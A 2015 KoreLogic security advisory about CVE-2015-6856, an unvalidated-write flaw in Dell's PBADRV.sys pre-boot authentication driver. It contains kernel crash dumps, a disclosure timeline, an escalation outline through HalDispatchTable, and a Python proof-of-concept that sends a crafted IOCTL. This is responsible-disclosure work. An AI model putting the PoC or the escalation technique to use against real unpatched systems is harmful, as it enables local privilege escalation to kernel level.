KL-001-2015-008 : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address Dec 18 2015 09:54PM
KoreLogic Disclosures (disclosures korelogic com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2015-008 : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address

Title: Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address
Advisory ID: KL-001-2015-008
Publication Date: 2015.12.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-008.txt

1. Vulnerability Details

Affected Vendor: Dell
Affected Product: Pre-Boot Authentication Driver
Affected Version: 1.0.1.5
Platform: Microsoft Windows XP SP3, Microsoft Windows 2003 SP2,
Microsoft Windows 7
CWE Classification: CWE-20: Improper input validation
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-6856

2. Vulnerability Description

The Dell Pre-Boot Authentication Driver (PBADRV.sys) contains
a vulnerability that can be leveraged to enable an attacker to
write arbitrary code. The 'OutputAddress' from the IOCTL call is
not validated before it attempts to write to memory. The content
of the write is a four-byte hex value that is always greater
than that of the kernel base address. Using multiple writes, it
may be possible to overwrite the first entry of HalDispatchTable
in a way that the entry would point to a user-land address. An
attacker need only allocate shellcode at said address and call
the ntdll!NtQueryIntervalProfile() function.

3. Technical Description

Example against Windows XP:

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Loading Dump File [C:\WINXP\MEMORY.DMP]
Kernel Complete Dump File: Full address space is available

Symbol search path is: srv*
Executable search path is:
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
Debug session time: Tue Feb 3 05:41:17.712 2015 (UTC - 8:00)
System Uptime: 0 days 0:03:46.296
Loading Kernel Symbols
....

kd> !analyze -v

READ_ADDRESS: 909090d4
FAULTING_IP:
+2902faf00efdfc0
00000008 8b4044 mov eax,dword ptr [eax+44h]

MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: pythonw.exe

TRAP_FRAME: b24bdc8c -- (.trap 0xffffffffb24bdc8c)
ErrCode = 00000000
eax=90909090 ebx=8060ea01 ecx=00000000 edx=0021f7f0 esi=012c1be8 edi=b24bdd64
eip=00000008 esp=b24bdd00 ebp=b24bdd20 iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
00000008 8b4044 mov eax,dword ptr [eax+44h] ds:0023:909090d4=????????

Resetting default scope
LAST_CONTROL_TRANSFER: from 8051cc7f to 804f8cc5

STACK_TEXT:
b24bdc14 8051cc7f 00000050 909090d4 00000000 nt!KeBugCheckEx+0x1b
b24bdc74 805405d4 00000000 909090d4 00000000 nt!MmAccessFault+0x8e7
b24bdc74 00000008 00000000 909090d4 00000000 nt!KiTrap0E+0xcc
WARNING: Frame IP not in any known module. Following frames may be wrong.
b24bdcfc 8063d5cd 00000001 0000000c b24bdd14 0x8
b24bdd20 8060eb43 00000002 b24bdd64 0021f7f8 nt!KeQueryIntervalProfile+0x37
b24bdd54 8053d6d8 00000002 012c1be8 0021f7fc nt!NtQueryIntervalProfile+0x61
b24bdd54 7c90e514 00000002 012c1be8 0021f7fc nt!KiFastCallEntry+0xf8
0021f7e4 7c90d84a 1d1add9a 00000002 012c1be8 ntdll!KiFastSystemCallRet
0021f7e8 1d1add9a 00000002 012c1be8 0021f89c ntdll!NtQueryIntervalProfile+0xc
0021f7fc 1d1acab6 1d1ac900 0021f81c 00000008 _ctypes!DllCanUnloadNow+0x5b6a
0021f82c 1d1a8db8 7c90d83e 0021f920 24f7d09f _ctypes!DllCanUnloadNow+0x4886
0021f8dc 1d1a959e 00001100 7c90d83e 0021f910 _ctypes!DllCanUnloadNow+0xb88
0021f984 1d1a54d8 7c90d83e 012d4300 00000000 _ctypes!DllCanUnloadNow+0x136e
0021f9dc 1e07cf0c 00000000 012d4300 00000000 _ctypes+0x54d8
00000000 00000000 5044408b 000004bb 88808b00 python27!PyObject_Call+0x4c

STACK_COMMAND: kb
FOLLOWUP_IP:
nt!KiTrap0E+cc
805405d4 85c0 test eax,eax

SYMBOL_STACK_INDEX: 2
SYMBOL_NAME: nt!KiTrap0E+cc
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nt
IMAGE_NAME: ntkrnlpa.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 4d00d4fb
FAILURE_BUCKET_ID: 0x50_nt!KiTrap0E+cc
BUCKET_ID: 0x50_nt!KiTrap0E+cc
Followup: MachineOwner
---------

Example against Windows 7:

Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Loading Dump File [C:\Users\dev\Desktop\Mini091715-01.dmp]
Mini Kernel Dump File: Only registers and stack trace are available

Symbol search path is: *** Invalid ***
************************************************************************
****
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
************************************************************************
****
Executable search path is:
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
* *
* The Symbol Path can be set by: *
* using the _NT_SYMBOL_PATH environment variable. *
* using the -y <symbol_path> argument when starting the debugger. *
* using .sympath and .sympath+ *
*********************************************************************
Unable to load image \WINDOWS\system32\ntkrnlpa.exe, Win32 error 0n2
*** WARNING: Unable to verify timestamp for ntkrnlpa.exe
*** ERROR: Module load completed but symbols could not be loaded for ntkrnlpa.exe
Windows Server 2003 Kernel Version 3790 (Service Pack 2) UP Free x86 compatible
Product: Server, suite: Enterprise TerminalServer SingleUserTS
Machine Name:
Kernel base = 0x80800000 PsLoadedModuleList = 0x808a1fe8
Debug session time: Thu Sep 17 08:21:15.962 2015 (UTC - 7:00)
System Uptime: 0 days 0:10:19.785
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
* *
* The Symbol Path can be set by: *
* using the _NT_SYMBOL_PATH environment variable. *
* using the -y <symbol_path> argument when starting the debugger. *
* using .sympath and .sympath+ *
*********************************************************************
Unable to load image \WINDOWS\system32\ntkrnlpa.exe, Win32 error 0n2
*** WARNING: Unable to verify timestamp for ntkrnlpa.exe
*** ERROR: Module load completed but symbols could not be loaded for ntkrnlpa.exe
Loading Kernel Symbols
...............................................................
............................................................
Loading User Symbols
Loading unloaded module list
..
************************************************************************
*******
* *
* Bugcheck Analysis *
* *
************************************************************************
*******

Use !analyze -v to get detailed debugging information.
BugCheck 50, {ffffffff, 1, 80820de3, 0}
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

************************************************************************
*
*** WARNING: Unable to verify timestamp for hal.dll
*** ERROR: Module load completed but symbols could not be loaded for hal.dll
*** WARNING: Unable to verify timestamp for PBADRV.sys
*** ERROR: Module load completed but symbols could not be loaded for PBADRV.sys
*** WARNING: Unable to verify timestamp for srv.sys
*** ERROR: Module load completed but symbols could not be loaded for srv.sys
************************************************************************
*
Probably caused by : PBADRV.sys ( PBADRV+13a0 )

Followup: MachineOwner
---------

kd> .symfix;.reload
Loading Kernel Symbols
...............................................................
............................................................
Loading User Symbols
Loading unloaded module list
..
kd> !analyze -v
************************************************************************
*******
* *
* Bugcheck Analysis *
* *
************************************************************************
*******

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffffffff, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 80820de3, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

Could not read faulting driver name
Unable to load image \??\C:\Documents and Settings\Administrator\Desktop\PBADRV.sys, Win32 error 0n2
*** WARNING: Unable to verify timestamp for PBADRV.sys
*** ERROR: Module load completed but symbols could not be loaded for PBADRV.sys

WRITE_ADDRESS: GetPointerFromAddress: unable to read from 808a1df0
GetPointerFromAddress: unable to read from 808a1de8
GetUlongFromAddress: unable to read from 808a67f8
ffffffff

FAULTING_IP:
nt!IopCompleteRequest+97
80820de3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
MM_INTERNAL_CODE: 0
CUSTOMER_CRASH_COUNT: 1
DEFAULT_BUCKET_ID: DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: python.exe
CURRENT_IRQL: 1
ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
IRP_ADDRESS: 87c57378
TRAP_FRAME: ba456a6c -- (.trap 0xffffffffba456a6c)
ErrCode = 00000002
eax=00000004 ebx=87c57378 ecx=00000001 edx=00000000 esi=88064e50 edi=ffffffff
eip=80820de3 esp=ba456ae0 ebp=ba456b24 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
nt!IopCompleteRequest+0x97:
80820de3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope

LAST_CONTROL_TRANSFER: from 8085b93b to 80827109

STACK_TEXT:
ba4569e0 8085b93b 00000050 ffffffff 00000001 nt!KeBugCheckEx+0x1b
ba456a54 808885d8 00000001 ffffffff 00000000 nt!MmAccessFault+0xa91
ba456a54 80820de3 00000001 ffffffff 00000000 nt!KiTrap0E+0xd8
ba456b24 8082cd9a 87c573b8 ba456b70 ba456b64 nt!IopCompleteRequest+0x97
ba456b74 80a59f1f 00000000 00000000 00000000 nt!KiDeliverApc+0xb8
ba456b94 80a5a153 ba456b01 00000000 87c573b8 hal!HalpDispatchSoftwareInterrupt+0x49
ba456bb0 80a5a1d0 00000001 ba456b00 ba456bd0 hal!HalpCheckForSoftwareInterrupt+0x81
ba456bc0 8082f793 00000000 ba456b00 ba456bf0 hal!KfLowerIrql+0x62
ba456bd0 80829939 87c573b8 87c57378 00000000 nt!KiExitDispatcher+0xd3
ba456bf0 8081daa5 87c573b8 87a0cb68 00000000 nt!KeInsertQueueApc+0x57
ba456c24 ba5423a0 87c57378 87cbb490 87c57378 nt!IopfCompleteRequest+0x201
WARNING: Stack unwind information not available. Following frames may be wrong.
ba456c3c 8081d7d3 87d13c88 87c57378 87a0cb68 PBADRV+0x13a0
ba456c50 808ef85d 87c573e8 87a0cb68 87c57378 nt!IofCallDriver+0x45
ba456c64 808f05ff 87d13c88 87c57378 87a0cb68 nt!IopSynchronousServiceTail+0x10b
ba456d00 808e912e 00000788 00000000 00000000 nt!IopXxxControlFile+0x5e5
ba456d34 80885614 00000788 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
ba456d34 7c82845c 00000788 00000000 00000000 nt!KiSystemServicePostCall
0021fa8c 00000000 00000000 00000000 00000000 0x7c82845c

STACK_COMMAND: kb

FOLLOWUP_IP:
PBADRV+13a0
ba5423a0 ?? ???

SYMBOL_STACK_INDEX: b
SYMBOL_NAME: PBADRV+13a0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: PBADRV
IMAGE_NAME: PBADRV.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 478274de
FAILURE_BUCKET_ID: 0x50_PBADRV+13a0
BUCKET_ID: 0x50_PBADRV+13a0
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:0x50_pbadrv+13a0
FAILURE_ID_HASH: {7469b31a-ad45-6d57-5589-106dc943201e}
Followup: MachineOwner
---------

4. Mitigation and Remediation Recommendation

The vendor no longer supports this version, and no known
remediation is available.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2015.02.18 - KoreLogic sends vulnerability report and PoC to Dell.
2015.02.19 - Dell acknowledges receipt of vulnerability report.
2015.04.06 - KoreLogic contacts Dell for a progress update and directs
Dell to KoreLogic's 45 business day disclosure timeline.
2015.04.07 - Dell requests additional time to develop remediation.
2015.04.07 - KoreLogic asks for an estimate of the timeline for
remediation.
2015.04.09 - Dell responds to say they are unable to provide an estimate
for the length of time to develop a mitigation or
remediation strategy.
2015.04.27 - 45 business days have elapsed since the vulnerability was
reported to Dell.
2015.07.01 - 90 business days have elapsed since the vulnerability was
reported to Dell.
2015.08.13 - 120 business days have elapsed since the vulnerability was
reported to Dell.
2015.09.10 - KoreLogic requests a CVE from Mitre.
2015.09.10 - Mitre issues CVE-2015-6856.
2015.09.11 - KoreLogic requests update from Dell.
2015.09.18 - Dell responds to say they are unable to provide an estimate
for the length of time to develop a mitigation or
remediation strategy.
2015.09.30 - 150 business days have elapsed since the vulnerability was
reported to Dell.
2015.11.04 - KoreLogic notifies Dell the issue will be disclosed publicly
in 10 business days.
2015.11.04 - Dell states they are working on a remediation and asks
KoreLogic to continue to hold back public release.
2015.11.13 - 180 business days have elapsed since the vulnerability was
reported to Dell.
2015.12.03 - Dell responds with the following statement: "The referenced
software component is from an old version of Dell Data
Protection | Authentication that has not been shipped for
some time and is no longer supported. No software updates
are planned at this time."
2015.12.18 - Public disclosure.

7. Proof of Concept

########################################################################

#
# Copyright 2015 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
#
# Author: Matt Bergin (KoreLogic / Smash the Stack)
#
# Purpose: Dell PBADRV.sys Privilege Escalation PoC XP SP3
#
########################################################################

from ctypes import byref, c_int, c_ulong, windll
from sys import exit

CreateFileA, NtAllocateVirtualMemory = windll.kernel32.CreateFileA, windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory, DeviceIoControlFile = windll.kernel32.WriteProcessMemory, windll.ntdll.ZwDeviceIoControlFile
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ, FILE_SHARE_WRITE, OPEN_EXISTING, NULL = 2, 1, 3, 0

handle = CreateFileA("\\\\.\\PBADRV", FILE_SHARE_WRITE | FILE_SHARE_READ, 0, None, OPEN_EXISTING, 0, None)
NtAllocateVirtualMemory(-1, byref(c_int(0x1)), 0x0, byref(c_int(0xffff)), 0x1000 | 0x2000, 0x40)
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
DeviceIoControlFile(handle, NULL, NULL, NULL, byref(c_ulong(8)), 0x0022201c, 0x1, 0x258, 0x90909090, 0)

# Fail
CloseHandle(handle)
exit(0)

The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Poli
cy.v2.2.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCAAGBQJWdIB7AAoJEE1lmiwOGYkME7cH/13T9fnDcVjynm4OkHpd1BiN
9xvNtLruxQN12OLJrPKuH/ccp1L33J5YWacPbRt1rffSEFvntv7nD/dIHQFNSvAT
aFrEcjJ0hcj25Xd44IeG9QwP8QB2a4yAG1YLChlUOQwF9KJym1o7RBsAogeCLS+x
heq2hvOOTB+frxfFQX4M1C5Hl/vVdaVELmn6DuvmKqOQbKWoQDPufeUAZIMgDw4b
x3CtCY+WCI8KqhVo5EgA4anwJOKbQ0RSpWbN2KYnHALYuA9ndz5yNknzY82Wbydb
TCDflsijwfdq7kdlIA8HNp/y5Ekfv+G8NtbmugeZ0i4epI8eUZUfjSmSeKn2+rI=
=JAVc
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus